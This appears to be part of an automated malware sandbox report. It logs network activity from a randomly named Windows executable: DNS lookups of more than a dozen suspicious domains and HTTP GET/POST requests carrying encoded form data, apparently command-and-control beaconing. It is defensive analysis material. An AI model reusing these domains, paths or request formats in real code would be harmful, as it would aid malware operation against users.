                                                  Jul 1, 2024 19:27:07.339762926 CEST806449784.32.84.32192.168.2.7
                                                  Jul 1, 2024 19:27:07.815752029 CEST806449784.32.84.32192.168.2.7
                                                  Jul 1, 2024 19:27:07.815814972 CEST6449780192.168.2.784.32.84.32
                                                  Jul 1, 2024 19:27:08.842170954 CEST6449780192.168.2.784.32.84.32
                                                  Jul 1, 2024 19:27:08.847067118 CEST806449784.32.84.32192.168.2.7
                                                  Jul 1, 2024 19:27:11.688687086 CEST6449880192.168.2.784.32.84.32
                                                  Jul 1, 2024 19:27:11.693634987 CEST806449884.32.84.32192.168.2.7
                                                  Jul 1, 2024 19:27:11.693782091 CEST6449880192.168.2.784.32.84.32
                                                  Jul 1, 2024 19:27:11.695501089 CEST6449880192.168.2.784.32.84.32
                                                  Jul 1, 2024 19:27:11.707015038 CEST806449884.32.84.32192.168.2.7
                                                  Jul 1, 2024 19:27:12.193494081 CEST806449884.32.84.32192.168.2.7
                                                  Jul 1, 2024 19:27:12.196687937 CEST6449880192.168.2.784.32.84.32
                                                  Jul 1, 2024 19:27:13.201646090 CEST6449880192.168.2.784.32.84.32
                                                  Jul 1, 2024 19:27:13.206744909 CEST806449884.32.84.32192.168.2.7

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 1, 2024 19:23:35.492649078 CEST5186053192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:23:35.514746904 CEST53518601.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:23:37.567955971 CEST5364530162.159.36.2192.168.2.7
                                                  Jul 1, 2024 19:23:38.060596943 CEST5297553192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:23:38.303170919 CEST53529751.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:23:51.235771894 CEST5456053192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:23:51.256505013 CEST53545601.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:24:07.407736063 CEST6196353192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:24:07.455321074 CEST53619631.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:24:20.806411028 CEST6044653192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:24:20.902789116 CEST53604461.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:24:28.969827890 CEST5482053192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:24:29.457137108 CEST53548201.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:25:03.596227884 CEST5924953192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:25:03.772133112 CEST53592491.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:25:17.471127987 CEST6062153192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:25:17.489001036 CEST53606211.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:25:30.782805920 CEST6308053192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:25:31.075479031 CEST53630801.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:25:44.228532076 CEST6109853192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:25:44.763315916 CEST53610981.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:25:52.830728054 CEST5179753192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:25:52.979449034 CEST53517971.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:26:11.238993883 CEST5447353192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:26:11.600975037 CEST53544731.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:26:25.142311096 CEST5597853192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:26:25.492132902 CEST53559781.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:26:39.080004930 CEST5070153192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:26:39.183476925 CEST53507011.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:26:52.610913038 CEST6490653192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:26:52.969223022 CEST53649061.1.1.1192.168.2.7
                                                  Jul 1, 2024 19:27:07.268593073 CEST5632053192.168.2.71.1.1.1
                                                  Jul 1, 2024 19:27:07.321743011 CEST53563201.1.1.1192.168.2.7

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jul 1, 2024 19:23:35.492649078 CEST192.168.2.71.1.1.10x7a98Standard query (0)www.erhaltungsmassage.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:23:38.060596943 CEST192.168.2.71.1.1.10xbc9fStandard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                  Jul 1, 2024 19:23:51.235771894 CEST192.168.2.71.1.1.10x31f9Standard query (0)www.oyoing.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:24:07.407736063 CEST192.168.2.71.1.1.10xc5bbStandard query (0)www.foryourhealth19.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:24:20.806411028 CEST192.168.2.71.1.1.10xfc7fStandard query (0)www.oudcafeae.onlineA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:24:28.969827890 CEST192.168.2.71.1.1.10xe934Standard query (0)www.86wqi.cyouA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:03.596227884 CEST192.168.2.71.1.1.10xabdStandard query (0)www.vivaepicmarbella.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:17.471127987 CEST192.168.2.71.1.1.10x6294Standard query (0)www.lookstudiov.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:30.782805920 CEST192.168.2.71.1.1.10x5d53Standard query (0)www.cr-pos.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:44.228532076 CEST192.168.2.71.1.1.10xc9a8Standard query (0)www.antifabricated.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:52.830728054 CEST192.168.2.71.1.1.10xe6dcStandard query (0)www.tufftiff.xyzA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:11.238993883 CEST192.168.2.71.1.1.10xd879Standard query (0)www.botokkkd4.topA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:25.142311096 CEST192.168.2.71.1.1.10x290cStandard query (0)www.cvt-auto.ruA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:39.080004930 CEST192.168.2.71.1.1.10x282cStandard query (0)www.ridcoredry.liveA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:52.610913038 CEST192.168.2.71.1.1.10xc363Standard query (0)www.filmbrute.comA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:27:07.268593073 CEST192.168.2.71.1.1.10x7780Standard query (0)www.xn--gotopia-bya.comA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jul 1, 2024 19:23:35.514746904 CEST1.1.1.1192.168.2.70x7a98No error (0)www.erhaltungsmassage.com217.160.0.31A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:23:38.303170919 CEST1.1.1.1192.168.2.70xbc9fName error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                  Jul 1, 2024 19:23:51.256505013 CEST1.1.1.1192.168.2.70x31f9No error (0)www.oyoing.com127.0.0.1A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:24:07.455321074 CEST1.1.1.1192.168.2.70xc5bbNo error (0)www.foryourhealth19.com172.67.194.145A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:24:07.455321074 CEST1.1.1.1192.168.2.70xc5bbNo error (0)www.foryourhealth19.com104.21.84.156A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:24:20.902789116 CEST1.1.1.1192.168.2.70xfc7fServer failure (2)www.oudcafeae.onlinenonenoneA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:24:29.457137108 CEST1.1.1.1192.168.2.70xe934No error (0)www.86wqi.cyou38.55.194.30A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:03.772133112 CEST1.1.1.1192.168.2.70xabdNo error (0)www.vivaepicmarbella.com46.30.215.51A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:17.489001036 CEST1.1.1.1192.168.2.70x6294No error (0)www.lookstudiov.com74.208.236.162A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:31.075479031 CEST1.1.1.1192.168.2.70x5d53No error (0)www.cr-pos.com192.250.231.28A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:44.763315916 CEST1.1.1.1192.168.2.70xc9a8Server failure (2)www.antifabricated.comnonenoneA (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:25:52.979449034 CEST1.1.1.1192.168.2.70xe6dcNo error (0)www.tufftiff.xyz162.0.238.43A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:11.600975037 CEST1.1.1.1192.168.2.70xd879No error (0)www.botokkkd4.topbotokkkd4.topCNAME (Canonical name)IN (0x0001)false
                                                  Jul 1, 2024 19:26:11.600975037 CEST1.1.1.1192.168.2.70xd879No error (0)botokkkd4.top43.198.80.127A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:25.492132902 CEST1.1.1.1192.168.2.70x290cNo error (0)www.cvt-auto.ru45.130.41.249A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:39.183476925 CEST1.1.1.1192.168.2.70x282cNo error (0)www.ridcoredry.live91.195.240.123A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:26:52.969223022 CEST1.1.1.1192.168.2.70xc363No error (0)www.filmbrute.com38.207.19.49A (IP address)IN (0x0001)false
                                                  Jul 1, 2024 19:27:07.321743011 CEST1.1.1.1192.168.2.70x7780No error (0)www.xn--gotopia-bya.comxn--gotopia-bya.comCNAME (Canonical name)IN (0x0001)false
                                                  Jul 1, 2024 19:27:07.321743011 CEST1.1.1.1192.168.2.70x7780No error (0)xn--gotopia-bya.com84.32.84.32A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • www.erhaltungsmassage.com
                                                  • www.foryourhealth19.com
                                                  • www.86wqi.cyou
                                                  • www.vivaepicmarbella.com
                                                  • www.lookstudiov.com
                                                  • www.cr-pos.com
                                                  • www.tufftiff.xyz
                                                  • 185.234.72.101
                                                  • www.botokkkd4.top
                                                  • www.cvt-auto.ru
                                                  • www.ridcoredry.live
                                                  • www.filmbrute.com
                                                  • www.xn--gotopia-bya.com

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.749712217.160.0.31806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:23:35.528269053 CEST464OUTGET /ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcp HTTP/1.1
                                                  Host: www.erhaltungsmassage.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:23:36.188384056 CEST745INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html
                                                  Content-Length: 601
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:23:36 GMT
                                                  Server: Apache
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.764456172.67.194.145806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:07.464421034 CEST737OUTPOST /ym7q/ HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.foryourhealth19.com
                                                  Referer: http://www.foryourhealth19.com/ym7q/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 5a 7a 78 6c 32 43 63 4e 63 4a 67 36 42 46 64 51 70 66 6d 36 4c 4c 66 68 33 56 53 54 54 32 6b 69 69 69 50 6c 59 53 30 5a 6d 51 51 68 31 4d 6f 72 58 48 64 66 2b 55 6a 61 73 56 47 63 5a 42 6b 31 72 37 4c 2b 31 2b 74 4b 7a 53 52 57 48 34 69 6d 42 31 57 47 78 47 6d 38 49 54 36 37 73 72 2f 31 41 2b 41 41 6f 61 61 74 4f 67 6c 4c 73 34 6f 46 4c 31 56 34 4c 6d 63 63 4b 32 73 6c 52 4c 46 35 6a 6e 32 6c 53 65 30 70 59 2b 47 66 64 4d 61 31 53 6c 62 53 45 66 31 67 62 34 53 68 31 30 6e 62 79 42 59 64 43 46 48 37 53 4c 68 59 61 55 53 7a 39 76 44 5a 61 67 4a 6d 72 58 58 65 44 63 6f 2f 35 2b 75 66 6d 43 6d 41 55 48 78 79 63 56 4c 34 4a 77 3d 3d
                                                  Data Ascii: FTP84=Zzxl2CcNcJg6BFdQpfm6LLfh3VSTT2kiiiPlYS0ZmQQh1MorXHdf+UjasVGcZBk1r7L+1+tKzSRWH4imB1WGxGm8IT67sr/1A+AAoaatOglLs4oFL1V4LmccK2slRLF5jn2lSe0pY+GfdMa1SlbSEf1gb4Sh10nbyBYdCFH7SLhYaUSz9vDZagJmrXXeDco/5+ufmCmAUHxycVL4Jw==
                                                  Jul 1, 2024 19:24:08.160142899 CEST879INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:08 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:08 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2Bymy%2F47YGKLuptjPc%2FFtTMCiL0eKvE%2FXL5LAyiNqSylVIdQ75P1qZj%2Fn2%2FuMx8L%2FyZakR5RNjWL1ayG5NGMsnmZuQ13AszDw2N3jmPLkeVcQZ2wVqFf5dq%2B%2BOjOTFjxateKfBbP5zEklg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c8167d49c43342-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.764457172.67.194.145806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:10.023534060 CEST757OUTPOST /ym7q/ HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.foryourhealth19.com
                                                  Referer: http://www.foryourhealth19.com/ym7q/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 5a 7a 78 6c 32 43 63 4e 63 4a 67 36 41 6c 74 51 72 2f 61 36 65 37 66 67 30 56 53 54 47 47 6b 6d 69 69 44 6c 59 58 56 47 6e 6d 41 68 32 74 59 72 57 47 64 66 7a 30 6a 61 6b 31 47 5a 45 78 6b 79 72 37 48 4d 31 2f 52 4b 7a 53 74 57 48 35 2b 6d 55 57 2b 5a 7a 57 6d 36 54 6a 36 6c 78 37 2f 31 41 2b 41 41 6f 61 4f 48 4f 67 39 4c 73 49 59 46 4c 55 56 37 56 32 63 66 61 6d 73 6c 56 4c 45 77 6a 6e 32 39 53 66 70 47 59 39 75 66 64 4a 2b 31 53 77 33 52 4f 66 31 69 47 49 54 47 34 48 58 55 30 6a 49 6e 49 45 50 46 4c 37 64 50 57 43 50 52 6e 4e 50 31 45 78 78 64 76 56 7a 6f 55 36 31 4b 37 2f 71 48 72 67 53 68 4c 77 55 59 52 48 71 38 66 4e 74 37 39 62 6e 78 6f 37 65 4e 41 53 6c 71 54 56 42 64 4c 7a 73 3d
                                                  Data Ascii: FTP84=Zzxl2CcNcJg6AltQr/a6e7fg0VSTGGkmiiDlYXVGnmAh2tYrWGdfz0jak1GZExkyr7HM1/RKzStWH5+mUW+ZzWm6Tj6lx7/1A+AAoaOHOg9LsIYFLUV7V2cfamslVLEwjn29SfpGY9ufdJ+1Sw3ROf1iGITG4HXU0jInIEPFL7dPWCPRnNP1ExxdvVzoU61K7/qHrgShLwUYRHq8fNt79bnxo7eNASlqTVBdLzs=
                                                  Jul 1, 2024 19:24:10.762649059 CEST875INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:10 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:10 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwCJnTv%2BJ2biJChg1%2FB6iIHYzJ348OvD9GWQ1GQCOOGCaZ6dMPc5i%2FbooNLIBx4Dp%2BDBT%2FWK1fCZhWkEGZUG9Y4bzJ2TxVjW41YdaqQMaVpqB69hi4z0d2R2hvV%2FwfDVPZ%2FnV5IalID3xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c8168d9de61861-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a
                                                  Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh
                                                  Jul 1, 2024 19:24:10.763577938 CEST5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.764458172.67.194.145806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:24:12.554569006 CEST1770OUTPOST /ym7q/ HTTP/1.1
                                                  Host: www.foryourhealth19.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.foryourhealth19.com
                                                  Referer: http://www.foryourhealth19.com/ym7q/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 5a 7a 78 6c 32 43 63 4e 63 4a 67 36 41 6c 74 51 72 2f 61 36 65 37 66 67 30 56 53 54 47 47 6b 6d 69 69 44 6c 59 58 56 47 6e 6d 49 68 31 65 51 72 51 68 78 66 79 30 6a 61 6c 31 47 59 45 78 6c 75 72 37 65 46 31 2f 64 77 7a 58 70 57 46 62 32 6d 46 48 2b 5a 36 57 6d 36 62 44 36 6b 73 72 2f 67 41 2b 51 45 6f 61 65 48 4f 67 39 4c 73 4c 41 46 43 6c 56 37 58 32 63 63 4b 32 73 58 52 4c 45 59 6a 6e 4f 48 53 66 74 73 59 4e 4f 66 64 6f 43 31 51 43 50 52 54 50 31 38 46 49 54 65 34 48 61 55 30 6a 6b 42 49 45 37 76 4c 38 35 50 53 55 53 30 30 5a 62 70 56 67 4e 37 68 47 2f 39 5a 62 52 72 37 4a 6d 6e 70 68 69 77 44 48 6b 78 4a 48 57 52 52 35 30 72 6d 6f 7a 65 77 71 43 48 52 57 51 36 50 48 52 34 53 6c 44 34 68 7a 61 4a 61 4a 4f 76 49 39 73 45 6a 41 54 70 6d 69 67 6a 69 43 6a 73 30 37 63 41 49 61 72 32 76 74 7a 49 6f 57 73 59 2f 47 68 53 31 61 4e 6f 41 38 61 6d 67 6e 42 47 4b 6d 70 2f 35 4d 68 42 30 4b 6b 4d 66 6d 56 63 45 4d 69 31 34 52 32 43 71 6c 37 57 4c 67 49 61 62 56 71 39 5a 4d 30 70 78 79 57 6f [TRUNCATED]
                                                  Data Ascii: FTP84=Zzxl2CcNcJg6AltQr/a6e7fg0VSTGGkmiiDlYXVGnmIh1eQrQhxfy0jal1GYExlur7eF1/dwzXpWFb2mFH+Z6Wm6bD6ksr/gA+QEoaeHOg9LsLAFClV7X2ccK2sXRLEYjnOHSftsYNOfdoC1QCPRTP18FITe4HaU0jkBIE7vL85PSUS00ZbpVgN7hG/9ZbRr7JmnphiwDHkxJHWRR50rmozewqCHRWQ6PHR4SlD4hzaJaJOvI9sEjATpmigjiCjs07cAIar2vtzIoWsY/GhS1aNoA8amgnBGKmp/5MhB0KkMfmVcEMi14R2Cql7WLgIabVq9ZM0pxyWoHrMyLMVK16ytJ7dGwsrFGsgHLf9IACPEWwyk7WIcxGKzH8zLGF9g0NAy3+GovncGKzjJcWm37atry9rJSNIPuDjaf4wf9AvTLl5ZRLMaF9uwq6c63Ls3Og+jK9K+KLIX7h2f6JEArigdqD4sUTMuU9lMhnJI0604V2oou6EnOITQrLLh2BZqtW7f+XaxlonN25InalMJZPeBuo5IoeIkKaWinBinMgxb3VsHvu0XUKs6iSNRpbr0PxExOVh2pj3MaNuPvuY0fnLgbp3PB8pT6iuMpADsvsEDonWgdszXMM9rxak/McedTeZQWNesrAb9WjmQ4isTfHbXytKQasxVskd9NFrUFv4qVmONDLb9FBbTvl4u6uuvDC+VLaD2urgU0dAO3MlnvcCKGPymuFdI2VgR9R6Bmvr9rAs+RVe3YsFPVCJAqoCUPmW2Ro19mfEFfBi+4pGAcNmWRP+royfMDvF0kwFP5U9N3f1ybDfRngzmoo0qdTA6Hz/94kd0+qNzpb5sY1+FKj8pFJZ3AmK0lnycHzBSHOdK/upwXIEfvqnj+SgVAuP92X0im0LBjVJA1ygAggrrbWK+SiwFRTz5npcHDQSJP+ZKxddLwfcW0CBPuuq67i9T2duY88SNnPK5vHFEZJGBlPq6ppvhJFXySQxoAqG5tzRUxR [TRUNCATED]
                                                  Jul 1, 2024 19:24:13.251588106 CEST871INHTTP/1.1 404 Not Found
                                                  Date: Mon, 01 Jul 2024 17:24:13 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                  Expires: Mon, 01 Jul 2024 17:24:13 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUWgQue1Wm10I2%2FTLrJbffBvm2P1%2BOCfmfZZKEyzgoWO4hPpLK5uA%2BIYJkt1N2U3McWZDjvv0r4VKG6i8MOVXYKa%2Br1KQn4HjtRUducmDTMxTD791UEuQFAvqRe4Ke%2BweDYlIMIsdElXUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 89c8169d1c67c323-EWR
                                                  Content-Encoding: gzip
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
